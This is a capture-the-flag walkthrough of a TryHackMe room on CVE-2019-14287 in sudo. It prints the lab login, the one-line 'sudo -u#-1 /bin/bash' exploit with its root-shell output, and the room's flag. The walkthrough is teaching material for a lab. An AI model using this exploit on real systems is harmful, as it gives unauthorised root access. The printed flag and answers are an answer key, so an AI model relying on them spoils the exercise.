In this walk through, we will be going through the Sudo Security Bypass room from Tryhackme. In this room, we will explore CVE-2019-14287 which is a vulnerability found in Unix Sudo Program and exploit it to get the root. On that note, let’s get started.
Table of Contents
Machine Info:
Title | SudoVulns |
IPaddress | 10.10.177.149 |
Difficulty | Easy |
Objective | A tutorial room exploring CVE-2019-14287 in the Unix Sudo Program. Room One in the SudoVulns Series |
Task 1 – Deploy!
ssh -p 2222 [email protected]
Task 2 – Security Bypass
SSH into that machine you deployed earlier, using port 2222.
The credentials are:
Username: tryhackme
Password: tryhackme
If you’re using Linux, the command will look like this:
ssh -p 2222 [email protected]
Question 1 – What command are you allowed to run with sudo?
sudo -l
/bin/bash
Question 2 – What is the flag in /root/root.txt?
tryhackme@sudo-privesc:~$ sudo -u#-1 /bin/bash root@sudo-privesc:~# root@sudo-privesc:~# id uid=0(root) gid=1000(tryhackme) groups=1000(tryhackme) root@sudo-privesc:~# whoami root root@sudo-privesc:~# cat /root/root.txt THM{l33t_s3cur1ty_bypass} root@sudo-privesc:~#
THM{l33t_s3cur1ty_bypass}
Also Read: Tryhackme – SQL Injection Lab
So that was “Sudo Security Bypass” for you. In this room, we have learned and explored the CVE-2019-14287 which is a vulnerability found in Unix Sudo Program and exploit it to get the root. We logged into the server using SSH and then used the sudo bypass command and got our root flag. On that note, i will take your leave but stay tuned for the next one and till then, remember to “Hack the planet”.